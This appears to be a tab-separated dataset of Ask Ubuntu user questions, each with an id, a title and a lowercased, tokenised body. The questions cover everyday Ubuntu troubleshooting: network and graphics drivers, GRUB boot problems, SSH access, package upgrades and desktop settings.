113794	how do i install the ethernet drivers in ubuntu 10.04	i ran the command : ifconfig -a which gave this output , there is no eth0 : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:82330 errors:0 dropped:0 overruns:0 frame:0 tx packets:82330 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11151678 ( 11.1 mb ) tx bytes:11151678 ( 11.1 mb ) usb0 link encap : ethernet hwaddr 6a:55:7c : ee:9a:59 inet addr:192.168.42.230 bcast:192.168.42.255 mask:255.255.255.0 inet6 addr : fe80 : :6855:7cff : feee:9a59/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2893 errors:0 dropped:0 overruns:0 frame:0 tx packets:9773 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:923185 ( 923.1 kb ) tx bytes:1483133 ( 1.4 mb ) wlan0 link encap : ethernet hwaddr 8c : a9:82:21 : ee:02 inet6 addr : fe80 : :8ea9:82ff : fe21 : ee02/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:14250 errors:0 dropped:0 overruns:0 frame:0 tx packets:92483 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6283319 ( 6.2 mb ) tx bytes:54238522 ( 54.2 mb ) and i ran cat /etc/network/interfaces : auto lo iface lo inet loopback i ran lspci -nn |grep ethernet : 04:00.0 ethernet controller [ 0200 ] : atheros communications ar8152 v1.1 fast ethernet [ 1969:2060 ] ( rev c1 ) how would i install ethernet drivers ?
113800	how do i change the default view in kate ?	whenever i open a file with kate , kate opens in split view showing the same file twice . does any of you guys know how to turn split-view off by default ? it 's really annoying to turn it off manually everytime .
113805	how to make a root script run pynotify	i need to run a script as root called root.py . i need to create notifications within the script . i made a separate script specifically for the notifications called notify.py . here is notify.py : import pynotify import sys def notify ( title , message ) : n = pynotify.notification ( title , message , `` notification-message-im '' ) n.show ( ) if __name__ == '__main__ ' : notify ( sys.argv [ 1 ] , sys.argv [ 2 ] ) notify.py script works well with a user not as root : python notify.py title message but i need to call this script inside root.py , which is ran as root . it fails if i run it as root . so , i tried to for lack of better words , sign out as root by launching it as another user ( i also replaced sudo with gksudo in the following ) : xhost local : user gksudo -u user notify.py title message wo n't work . any ideas ? btw : i had a similar problem with running gtk from root ran upstart scripts . also , gvfs wo n't change attributes as root when as other user as sudo .
113806	golddictonary and gnome 3	i 'm very new to linux . i just want to know that is it safe to install gnome3 in ubuntu 11.04 ? my second question is about golden dictionary in ubuntu . i could not install off-line dictionary . i followed the video , downloaded the packages , downloaded 7z too . i went to babylon website there i downloaded dictionary in hindi but they are in .exe file . i tried to extract .dsl file from .exe file but could n't get them .i even did n't get the cab file from .exe file but nothing work for me , can anyone tells me how to install off-line dictionary , or hindi dictionary or link to get .dsl file , any open source hindi dictionary ? please help me , thanx in advance .
113809	how can i perform operations on the output of a command ?	i 'd like to be able to move a few recent files to a new directory . i can list the most recent files by running ls -t | head , but now i want to be able to move ( mv ) those files . how can i do that ?
113813	why is a .trash-1000 hidden folder created when i try to delete files from a mounted microsd card ?	i have recently been mounting my android phone via a usb cable and have been adding and deleting files to the microsd card . however i noticed that space was not being freed up when i deleted files . it took a while to work out that whenever i delete a file they are actually being moved to a hidden folder on the card called .trash-1000 is this normal behaviour ? i guess ubuntu is creating some kind of recycle bin on the sd card ? and if it is normal behaviour is there a way to disable this function/delete files without them being placed in the .trash-1000 ?
113814	accidentally removed ia32-libs and now gui is not working	i have removed accidently i32-libs ... using the following command sudo apt-get remove ia32-libs now the gui is not properly working . how can i fix this ?
113816	setup static ip in virtual box	i have as issue i am ubuntu desktop and i have installed virtual-box ( 4.1 ) issue : - ubuntu 11.10 desktop is my host operating system and on virtual-box i installed ubuntu server selecting bridge adapter as my first adapter by default my network interfaces file get ip address by dhcp server but i want to setup an static ip . by changing network interface file to static and gave some static ips my internet stop working on guest operating system ( virtual-box - > ubuntu server ) . can any one help me how can i setup static on virtual-box so that my internet will work too on my guest operating system . thanks in advance .
113824	how to keep ssh server running with laptop lid closed	i 've changed the power management settings on my ubuntu 10.10 server laptop to keep running with the lid closed but i loose any attempts to connect to it by ssh . is there a way to change this so that it will always be running ? p.s : it works perfectly with the lid open ...
113835	ubuntu does not have screensaver on unity	on display settings on unity in brightness and lock does not show up the screensaver or does not have that option . am i not seen it right or unity does not display screensaver like in kde or gnome ? i am using ubuntu 12.04 beta however running a command electric sheep shows up in mplayer , but running gnome-screensaver or gnome-screensaver-command nothing happens.. do i have to install xscreensaver package ? or unity does not give screensaver at this time at all ?
113844	ubuntu 10.4 is running in low graphics mode no device detected	so i just bought a new laptop and am attempting to put ubuntu 10.4 on it 's own partition . after installation , i found that i was unable to change my screen resolution and that it labeled my monitor type as `` unknown '' . i figured the issue was that i did not have the nvidia drivers installed so i downloaded and installed them from nvidia 's website . this process involved killing the xserver while install went through , which was n't too much trouble . after installing the drivers , upon a fresh reboot i am given an error message stating that ubuntu is running in low-graphics mode . i am given the typical 5 options to choose from , but niether gets my screen resolution working properly . i have an nvidia 550m on a new asus laptop . asus n53sn http : //www.asus.com/notebooks/multimedia_entertainment/n53sn/ # specifications brand new , fresh install of ubuntu 10.4 . what my corg.conf file looks like : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknowkn '' modelname `` unknown '' horizsync 28.0-33.0 vertrefresh 43.0-72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
113845	un-install ubuntu server and grub menu	i have installed ubuntu server 11.10 and win 7 on different drives ( dual boot ) on my laptop . could anyone tell me how to remove ubuntu server and grub loader ? i have tried log in to win 7 and format my ubuntu server drive . but it wont work . it just give me grub error while booting . thanks..
113848	failed ubuntu installation costs 50 gb	i tried installing ubuntu 11.10 on my new laptop ( hp pavilion dv6-6b20se ) . i did n't want to do a complete re-install and pre-partitioning my hard disk , so i tried shrinking my main ntfs partition ( which was about 620 gb + recovery and system partitions ) and partitioning the unallocated space , using the ubuntu setup . it then showed the 50 gb i tried to shrink was unusable to allocate , so i expanded the ntfs partition back to its original size . not wanting to give up , i tried it again . again , it said it was unusable , so i expanded again . after rebooting , and booting up in windows 7 , i noticed about 50 gb missing from my c : / drive . it can not be found with disk manager or gparted .
113849	problems with grub	i updated ubuntu and when i restarted this message appeared : gnu grub version 1.99-12ubuntu5 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > and here is where i suppose i must write a command in order to open ubuntu normally , the problem is , what do i put ? please help ! ! ! !
113850	how to get a list of currently open files / application instances in unity launcher quicklist ?	how can i get a vertical list of currently open files in the unity launcher as a quicklist ( see mockup below ) ? this could be a list of files each application instance is editing , or in the case of browsers/terminals/other apps just a list of application instances , so that one can easily toggle between them without getting the visual expose-like view of all open files/apps . this is especially critical when you have 10+ instances open and want to navigate through them by name , not visually . in other words , similar to the way win 7 stacks open instances of an application in one icon , where right-clicking brings up a list of open instances . if this is not possible to achieve directly with the unity launcher , what is the next easiest way to mimic this functionality without installing new panels , changing desktop environments , etc ? i 'd like to leave unity the way it is , but just want this critical feature . mock-up of unity launcher quicklist of open files in gvim instances : also see bug # 817302 and task switching discussion on canonical design .
113861	'unable to mount filesystem ' error	trying to extract data from a 'bricked ' western digital mybook live 2tb drive . i came across a forum that advised to use ubuntu ( booted from a cd ) on my macbook . managed to download and create a boot cd for ubuntu ( like this little operating system btw ) . booted the machine with the cd and plugged the drive ( which i had extracted from it 's casing and placed into a external usb sata case & plugged to the laptop ) . the drive is seen by ubuntu but each time i click on the drive , it gives me the following error : unable to mount 2.0 tb filesystem error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sdb4 , missing codepage or helper program , or other error in some cases useful info is found in syslog -try dmesg | tail or so i am new to this and spent quite some time searching this site to see if i could find a solution to this problem without troubling anyone . i came up with a few that came close but some of the questioners mentioned that they had lost data ... which scared me from going further . i need to basically extract 1 particular folder from the drive . if i can get to mount this volume 'sdb4 ' , there is a folder called 'my_work ' which i need to back up . the rest i have/had a copy of . when i typed in dmesg | tail ... i got several lines..but i think ones that are relevant are : [ 406.864677 ] ext4-fs ( sdb4 ) : bad block size 65536 [ 429.098776 ] hfs : write access to a journaled filesystem is not supported , use the force option at your own risk , mounting read-only [ 439.786365 ] hfs : write access to a journaled filesystem is not supported , use the force option at your own risk , mounting read-only [ 445.982692 ] ext4-fs ( sdb4 ) : bad block size 65536 [ 1565.841690 ] ext4-fs ( sdb4 ) : bad block size 65536 i read somewhere to try/check 'sudo fdisk -l /dev/sdb4 ' . it gave me the following result : disk /dev/sdb44 : 1995.8 gb , 1995774623744 bytes 255 heads , 63 sectors/track , 242639 cylinders , total 3897997312 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb4 does n't contain a valid partition table this is where i reached and got frustrated and decided to try & get help on this without digging myself deeper into a hole ! i understand that the answer may already be out there . if so , could someone please point me in the right direction . and if not , could someone please resolve ( if possible ) my situation !
113863	how are files created ?	i want to know what the major differences are between windows and linux file creation . let 's say i 'm in a terminal session and i type : touch file . what happens behind the scenes in linux ? what is the process in the operating system ?
113865	( 12.04 beta 1 ) ubuntu 3d does n't work anymore , possibly a result of a partial upgrade	it all started with a message offering a partial update . i know what you 're thinking . `` oh joy . another new user who is n't smart enough to know better than to hit the partial upgrade button . '' i 'm pretty sure i did it the `` right '' way , by first going into synaptic , and checking to see what was going to be removed . to the best of my knowledge , nothing important ( just a telepathy lib called farsight , and a couple other im-related things , which i do n't use . ) i do n't know if i was supposed to do this , but i unmarked most of the removal-marked items , and the only one removed i think was empathy app , which i do n't use . a restart later , and on the surface everything seemed fine . there was just one issue , where the unity bar would n't hide . the update manager still had updates ( a lot , actually ) , but it was n't offering a partial upgrade , so i installed the updates . another restart later , and the unity-bar problem was fixed . however , it looks like i can only run in ubuntu 2d mode now . all the panel transparency stuff , etc , does n't work , though that 's just graphical related . the main problem is the fact that the unity panel is no longer displaying the system menu . ( see image ) i suspect that ubuntu is n't getting along with my gfx card anymore , and it thinks it ca n't run unity3d . one more thing , apport did detect a graphical-related crash , and a bug report was automatically filed . should i wait for the bugfix ?
113866	why x64 bit version is way more faster than x32 ?	lately i noticed that my old laptop ( toshiba satellite l500-1dt ) works better with x64 based ubuntu version , than x32 . well with faster i meant - adobe flash videos and apps works much better . software center and apt apps works much smoothly . everything works flawless on x64 . cooling fan works a lot less ( not cooling the system all the time , like on x32 ) . on x32 bit version i had a feeling , that my computer will overheat . 2 weeks ago my battery died when i ran x32 version . i do n't know , is it was because of overheating or coincidence . it got really hot , and very very slow . i 'm running on celeron ( r ) dual-core cpu t3000 @ 1.80ghz ă 2 and intel gma45 video chip-set ( with 256mb shared memory ) . ram - 4 gb . ubuntu 11.10 . this is not the only case and only machine i discovered that x64 works far more better , than so-called `` recommended 32-bit version '' . i 'm really curious about this , and would like to know answer once for all . please , explain this to me or guide me with a link . thank you !
113870	help installing gimp 2.7.5 on ubuntu 11.10	i have been trying to install gimp 2.7.5 for a few days now but keep getting this message : the following packages have unmet dependencies : gimp : depends : python-gtk2 ( > = 2.8.0 ) but 2.24.0-2 is to be installed depends : libc6 ( > = 2.11 ) but 2.13-20ubuntu5.1 is to be installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.8.0-3ubuntu2 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.24.0-1ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.30.0-0ubuntu4 is to be installed depends : libgs9 ( > = 8.61.dfsg.1 ) but 9.04~dfsg-0ubuntu11.5 is to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.24.6-0ubuntu5 is to be installed depends : libgudev-1.0-0 ( > = 147 ) but 1:173-0ubuntu4.1 is to be installed depends : libjpeg62 ( > = 6b1 ) but 6b1-1ubuntu2 is to be installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.34.1-2 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu3 is to be installed were would i get the things the program wants , and how ?
113880	radeon hd 6850 vmware 3d support ?	i 'm a new ubuntu user ( new to all of linux actually ) . i 've installed ubuntu 11.10 x64 and have been enjoying it , but i wanted to see how it would perform using vmware for small time gaming since i find dual booting too much of a nuisance to even bother using ubuntu at all ( sorry ! ) . i have an asus eah6850 directcu radeon hd 6850 graphics card and i 've installed the additional ati/amd proprietary fglrx graphics driver , but when i open a windows xp 32bit machine i installed through vmware , i get this message : '' the gpu driver currently installed on this host may cause issues with vmware products . if you notice any issues please disable the 3d support in the affected virtual machines . '' i still have 3d capabilities in the vm but they are very very choppy even running the dx tests ( the spinning cube ) . i 've seen people on youtube and other forums saying that since the new 3d acceleration in vmware 8 gaming is very possible through vms ( and i 've seen them running the dx tests with the spinning cube very smoothly ) . i 'm wondering if my graphics card is n't fully supported or if i have installed it wrong . also when i check system info ( on the host ubuntu machine ) it says `` graphics vesa : barts '' should my radeon hd 6850 be showing up there ? the rest of my basic system info i5 2500k 8gb 1600mhz memory guest is running with access to all 4 cores of processor and 3gb memory assigned .
113892	my @ symbol and other characters wo n't work , instead , i get other characters	i am fairly new to ubuntu , the first time i ran it of the disk drive , all keys worked fine . however , now @ = '' m=0 j=1 etc . i can only get a few correct letters . i tried all keyboard and language setting i know of ... this is rather annoying ! if you can help me , thanks a lot !
113896	desktop icon position not remembered	every time i bootup my ubuntu 11.10 , the desktop icons are shuffled and placed on top of each other . i wonder if this is a settings problem ( e.g . i can remove some configure file in my home folder to solve this problem permanantely ) , or it is a bug i shall report ? thanks , shannon
113897	why do i have two ( 2 ) launchers after customizing my unity setup with ccsm , plese help ?	when i installed ubuntu 11/10.and installed ccsm . and run the command `` compiz -- replace '' to take effects.but it gave the system like this >
113898	is this dist-upgrade normal ?	is this dist-upgrade normal ? it looks like there are way too many packages and some that should n't even be there i suppose . nuno @ mozart : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be removed : apparmor apport-gtk at avahi-daemon avahi-utils binfmt-support bluez bluez-alsa bluez-cups bluez-gstreamer brltty checkbox checkbox-gtk console-setup couchdb-bin cron cups cups-driver-gutenprint cups-pdf desktopcouch desktopcouch-ubuntuone dkms eclipse-jdt eclipse-pde eclipse-platform erlang-base erlang-inets erlang-public-key erlang-ssl friendly-recovery ftp gdm gnome-bluetooth gnome-disk-utility gnome-power-manager gnome-session gnome-session-bin gnome-session-fallback gnome-shell gnome-tweak-tool gnome-user-share gufw hplip hplip-cups indicator-power indicator-session irqbalance jarwrapper katepart kbd kde-runtime kdebase-runtime kdelibs-bin kdelibs5-plugins kdepim-runtime kdepimlibs-kio-plugins kdoctools keyboard-configuration knotes kubuntu-debug-installer lftp libakonadi-contact4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libkabc4 libkatepartinterfaces4 libkcal4 libkcalutils4 libkde3support4 libkdepim4 libkdewebkit5 libkemoticons4 libkfile4 libkhtml5 libkio5 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkontactinterface4 libkparts4 libkpimidentities4 libkpimtextedit4 libkpimutils4 libktexteditor4 libmailtransport4 libmicroblog4 libnss-mdns libplasma3 libsolid4 lightdm linux-generic linux-generic-pae linux-image-3.0.0-12-generic linux-image-3.0.0-12-generic-pae linux-image-3.0.0-13-generic linux-image-3.0.0-13-generic-pae linux-image-3.0.0-14-generic linux-image-3.0.0-14-generic-pae linux-image-3.0.0-15-generic linux-image-3.0.0-15-generic-pae linux-image-3.0.0-16-generic linux-image-3.0.0-16-generic-pae linux-image-generic linux-image-generic-pae linux-sound-base lsb-core modemmanager mysql-server mysql-server-5.1 nautilus-share network-manager network-manager-gnome network-manager-pptp network-manager-pptp-gnome ntfs-3g ntpdate oss-compat pcmciautils plasma-scriptengine-javascript plymouth-label plymouth-theme-fade-in plymouth-theme-ubuntu-logo plymouth-theme-ubuntu-text pm-utils powermgmt-base ppp pppconfig pppoeconf pptp-linux qapt-batch rsyslog sane-utils sat4j simple-scan telepathy-salut telnet ubuntu-minimal ubuntu-standard ufw update-notifier upower ureadahead usb-creator-common usb-creator-gtk wine wine1.3 wireless-crda xdiagnose xorg xserver-xorg xserver-xorg-core xserver-xorg-input-all xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-all xserver-xorg-video-ati xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-geode xserver-xorg-video-intel xserver-xorg-video-mach64 xserver-xorg-video-mga xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-r128 xserver-xorg-video-radeon xserver-xorg-video-s3 xserver-xorg-video-savage xserver-xorg-video-siliconmotion xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-trident xserver-xorg-video-vesa xserver-xorg-video-vmware the following new packages will be installed : diff erlang-base-hipe libraw1394-8 libsepol1 mktemp the following packages have been kept back : python-cddb python-notify the following packages will be upgraded : libavc1394-0 1 upgraded , 5 newly installed , 181 to remove and 2 not upgraded . need to get 0 b/9,339 kb of archives . after this operation , 1,565 mb disk space will be freed . do you want to continue [ y/n ] ?
113901	not able to login in ubuntu box with root password	i have ubuntu 10.04 on my sytem , i run command apt-get install csh on the system and try to change the shell by command chsh -s but now the prob is when i try to login the system by ssh i am not able to login by any user account except one and try to change the user su - root it is showing can not execute c : no such file or directory and look in the /etc/passwd file for root account in shell field c is written in place of /bin/sh help me out to restore the settings
113903	can cuda and gnome work together on an optimus laptop ?	here it goes , i have a laptop with an nvidia gt520m card and i am running ubuntu 11.10 . when i first installed ubuntu on my pc , i was able to use gnome3 and all was well ( i suppose my laptop was using the intel card instead of the nvidia one ) . because i wanted to develop some things in cuda from my own machine , i started to look around on what i could do , so that i could use the discrete card just for cuda and leave the other one to handle gnome . by installing nvidia 's current drivers and bumblebee , i am now able to run programs in cuda using optirun but my machine uses the simple version of gnome , without any effects whatsoever . of course , when i removed nvidia 's drivers , optirun could n't run cuda programs and stopped with : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load module `` nouveau '' ( module does not exist , 0 ) is there something i can do so that i can have both worlds ?
113904	release upgrade crashes with `` w : failed to fetch http : //host/debian/dists/oneiric/release.gpg ''	my update manager told me that it has not checked for updates in the past 18 days , so i clicked the `` check '' button . it works just fine until a certain point where it says `` downloading release '' . the loading bar moves across the screen for a while on that message , then it just stops and says to check my internet connection . i am fairly certain that my internet is fine , as i can do anything else that i have tried , including installing software over the internet . i clicked on `` details '' and this is what turned up : log
113910	rearranging custom-installed panel indicators	i 've seen a lot of other threads about people how to rearrange the panel icons , such as networking , time , volume etc . however , i have installed two custom indicators , and i really would prefer to have the 2nd one in ( my workspace indicator ) to be the farthest left . is this possible ?
113914	laptop heatup and auto-shutdown . any perm damage ?	so i 've been using ubuntu for a week now and i 've noticed that my laptop heats up like crazy compared to windows and it auto-shuts down . now i know that if i go to the terminal and use the command `` sensors '' it will show me the temperature . during basic browsing ( like now ) , the temperature is about 50-60 c , but that 's after i updated my dell 's bios , downloaded jupiter , powertop , laptop_mode_tools , lm-sensors , all the dell kernel modules , and enabled intel i916 rc6 . before all that , the temperature was around 70-84 c. yes , i know that 's pretty impressive but when i ever open a vid/file it goes up to 70 something c and when i turn on runescape ( i do n't play it , i just make scripts for it ) it soars sky-high to 80-100 . so i was wondering ( i know theirs nothing else i can do to improve the temperature except to buy a cooling pad ) if the temperature goes up to 80-90 c , could that possibly damage the internal systems ( cpu , motherboard , hard drive , fan , etc . ) permanently or so badly that they need to be replaced ? just in case you need to know my system specs : libsmbios version : 2.2.28 product name : inspiron n5010 vendor : dell inc. bios version : a15 ( newest one ) processor : intel® core™ i3 cpu m 350 @ 2.27ghz × 4 graphics : intel® ironlake mobile ram : 4 gb hdd : 350 gb os : ubuntu 11.10 ( unity ) 64 bit fan is placed to the left of the laptop ... if anyone knows anyway i can improve the temperature please help out !
113925	no windows in ubuntu boot menu ( ubuntu 11.10 , windows 7 )	install ubuntu 11.10 , successfully ; install windows 7 , successfully ; re-install grub with command mount /dev/sda1 /mnt ; grub-install âroot-directory=/mnt /dev/sda , successfully ; reboot . the ubuntu can start up and works corrected ; but the problem is : when reboot ( and press shift ) , there is no windows in the boot menu . output of command sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00011272 device boot start end blocks id system /dev/sda1 2048 761927679 380962816 83 linux /dev/sda2 761929726 781459455 9764865 5 extended partition 2 does not start on physical sector boundary . /dev/sda3 * 781459456 781664255 102400 7 hpfs/ntfs/exfat /dev/sda4 781664256 976771071 97553408 7 hpfs/ntfs/exfat /dev/sda5 761929728 781459455 9764864 82 linux swap / solaris
113927	icons appearing beside menu options	this suddenly started happening , and i do n't know why ... but i suspect that i bumped something . does anyone know what may cause these icons to appear ? beside `` create new folder '' and `` create new document '' and `` paste '' have never had these icons beside them before . i do n't mind them , but i want to know where they came from . this happens on ubuntu/ubuntu 2d , gnome/gnome classic , and cinnamon desktop environments . thanks all !
113937	how to transfer transmission configuration to another machine ?	i 'd like to know how can i keep my old transmission data when i do a new system installation . is there any way to keep my statistics , rate upload/download , etc. , and use them in my new installation ?
113955	cleaning up unwanted files in a liveusb	after running disk usage analyzer on the file system , i am looking for ways to remove unneeded files on my live usb . firstly , is there anything i can do about the files in the casper archive ? for example , i noticed that there exists a directory /rofs , which i 'm sure stands for read-only file system , the one stored in the read-only casper file , so i ca n't removing anything in it . specifically , i removed libreoffice yet /rofs/usr/lib/libreoffice takes up 222 mb of precious storage , as does thunderbird and a bunch of other things . what can i clear regarding the apt program files . /var/lib/apt/lists takes up 115 mb , and /var/cache/apt ( not the archives directory ) is 139 mb . the /var/cache/apt folder is made up of several ~35 mb files , and i do n't know if they are all necessary : ubuntu @ ubuntu : /var/cache/apt $ du -ah 4.0k ./archives/partial 0 ./archives/lock 28k ./archives 4.0k ./typescript 34m ./srcpkgcache.bin 31m ./srcpkgcache.bin.ifdvia 34m ./pkgcache.bin.3ihvik 32k ./pkgcache.bin.h2zwz7 36m ./pkgcache.bin 133m . i already clear browsing data regularly when i use chrome , so i do n't think i have to deal with that much . however , i see that there are cache folders for other programs , and i wish to know if there is a safe way to remove the cache . generally , my question revolves around why i have only less than 300 mb on my 4.0 gb usb thumb drive when i only use it for browsing and simple development in python . your help is appreciated .
113956	how to print using only the color cartridge ?	my printer ran out of black ink , but the color cartridge still has a lot of ink . i want to print using only ink from the color cartridge . i used to be able to do this using advanced printer settings of the printer driver in windows 7 . i was wondering if and how it can be done using ubuntu . i 'm also new to ubuntu , so i have no idea how to fiddle around with advanced settings . my printer is a canon ip2770 inkjet .
113960	running 32-bit sun-jdk in 64-bit ubuntu	i need to run 32bit sun-jdk on my 64bit ubuntu . i downloaded jdk and when run i get java.lang.unsatisfiedlinkerror : /opt/java/32/jdk1.6.0_31/jre/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( classloader.java:1807 ) at java.lang.classloader.loadlibrary ( classloader.java:1703 ) at java.lang.runtime.load0 ( runtime.java:770 ) at java.lang.system.load ( system.java:1003 ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( classloader.java:1807 ) at java.lang.classloader.loadlibrary ( classloader.java:1724 ) at java.lang.runtime.loadlibrary0 ( runtime.java:823 ) at java.lang.system.loadlibrary ( system.java:1028 ) at sun.security.action.loadlibraryaction.run ( loadlibraryaction.java:50 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.awt.nativelibloader.loadlibraries ( nativelibloader.java:38 ) at sun.awt.debughelper. < clinit > ( debughelper.java:29 ) at java.awt.component. < clinit > ( component.java:566 ) at com.mucommander.launcher.main ( launcher.java:466 ) exception in thread `` main '' java.lang.nullpointerexception at com.mucommander.text.translator.get ( translator.java:258 ) at com.mucommander.launcher.main ( launcher.java:612 ) i installed libxtst6 and libext6 : i386 to no avail . any ideas ?
113961	adding a keyboard layout in the guest session is not permanent	i 'm using ubuntu 11.10 oneiric . i have the default/administrator user but i also allow guest sessions in my netbook . i have 2 keyboard layouts setup for my main user : english and greek . the problem is that whenever a guest logs in , there is only one keyboard layout installed : the english one . is there a way to add the greek keyboard layout for guest users and make this change permanent ? thanks in advance .
113965	where to get complete offline installer for openssh-server ?	i want to download a complete off line openssh-server package installer . i need the offline package to setup for my school project but i do n't have the internet facility in the lab .
113966	what are the common pitfalls that would stop authorised key ssh access , and how do i find and correct for them ?	edit : this question was reworked to make it more useful to the community and less specific to me . questions seem to come up reasonably often regarding ssh and problems with authorised keys access , but very few seem to have a clear answer anywhere ; server keeps asking for password after i 've copied my ssh public key to authorized_keys ssh not accepting public key how do i use ssh with key access in 11.10 passwordless ssh not working so , in the communities opinion , what is the tried and tested method for getting to the bottom of such problems ?
113969	where i can download the wubi installer for ubuntu 10.04 lts ?	i just download the wubi installer for ubuntu 11.10 and gives me an error . and in a forum someone says me that if i can try downloading the wubi installer for ubuntu 10.04 lts but , i 'm seeking it about 30 mins and i ca n't find it . can someone help me ?
113973	how do i revert the plymouth theme back to default after purging kubuntu ?	i recently installed the kde kubuntu desktop but after somehow working with i decided to use pure gnome ubuntu desktop again.i remove kubuntu desktop and its packages completely but kubuntu background image still running at time of booting the system and shutting down it . i tried the steps below at terminal , it made the shutting down background image correct but still the background image of booting time is kubuntu image . sudo update-alternatives -- set default.plymouth /lib/plymouth/themes/ubuntu-logo/ubuntu-logo.plymouth how could i change this image to the default ubuntu image too ?
113974	ubuntu one indicator for gnome shell panel ?	is there any shell extension for an ubuntu one indicator in the top panel for gnome 3 shell ?
113976	how to make a lan connection ?	i am using ubuntu on a virtual machine and i want to acces the internet from ubuntu . i 'm having a lan network on the main computer .
113979	nvidia gt555m and ubuntu 11.10 drivers	i have a laptop with the nvidia gt555m on it but i want to use its full power not just the on board graphics . i tried installing the driver provided by nvidia at http : //www.nvidia.com/object/linux-display-amd64-295.20-driver.html no luck , my pc boots to a black screen with white letters . my card does not show up under proprietary drivers either so i ca n't find a solution . i have formatted my pc three times now in a day to get past the black screen . any help would be appreciated . thanks in advance !
113983	add packages to apt 's partial archives	i 'm experimenting with a possible answer for add packages to squid-deb-proxy cache , wherein i am trying to add files downloaded on a different network to the squid-deb-proxy cache . it occurred to me that if i could stick a downloaded package into apt 's partial downloads cache , installing it would then add it to the squid-deb-proxy cache . my question , then , is this : i have two computers , a laptop and a desktop . how can i add a package downloaded on the laptop to apt 's partial downloads cache on the desktop ? i 've tried simply putting it in /var/cache/apt/archives/partial , but when i go to install it , apt-get simply overwrites the file and tries to download it anew .
113984	is logitech 's unifying receiver supported ?	logitech has a unifying receiver that you can add several devices using the same usb device . is this supported in ubuntu and if so do i have to additionally configure something so that when adding a new wireless device it gets recognized by the same receiver . info : http : //www.logitech.com/en-us/66/6079
113989	is gnome-session-fallback viable long-term solution in 12.04 ?	after preliminary exploration of ubuntu 12.04 beta , i decided that unity is simply not my cup of tea . installing gnome-session-fallback looks ( perhaps ? ) like a solution , but there is some doubt in my mind whether or not this will be an `` official '' part of 12.04 when it is released , and whether or not using gnome fallback will be available and problem-free through the lifespan of the 12.04 release ?
113993	ubuntu 11.10 nvidia module failed to load ( no module exists )	i have an asus ul30vt with an intel/nvidia hybrid graphics card . i can get the intel driver to load just fine , but i am struggling to get the nvidia graphics card loaded . i have tried a number of different solutions including using the driver from ubuntu restricted drivers and from the nvidia website . i will describe my current situation though and see if that is enough information . let me know if more in needed . currently when i run jockey-text -- list | grep nvidia it returns the following kmod : nvidia_current - nvidia_current ( proprietary , enabled , not in use ) kmod : nvidia_current_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) also i can run modinfo nvidia_current and i see the following filename : /lib/modules/3.0.0-16-generic/updates/dkms/nvidia_current.ko alias : char-major-195-* version : 295.20 supported : external license : nvidia alias : pci : v000010ded00000e00sv*sd*bc04sc80i00* alias : pci : v000010ded00000aa3sv*sd*bc0bsc40i00* alias : pci : v000010ded*sv*sd*bc03sc02i00* alias : pci : v000010ded*sv*sd*bc03sc00i00* depends : vermagic : 3.0.0-16-generic smp mod_unload modversions 686 parm : nvreg_enablevia4x : int parm : nvreg_enablealiagp : int parm : nvreg_reqagprate : int parm : nvreg_enableagpsba : int parm : nvreg_enableagpfw : int parm : nvreg_mobile : int parm : nvreg_resmandebuglevel : int parm : nvreg_rmlogonrc : int 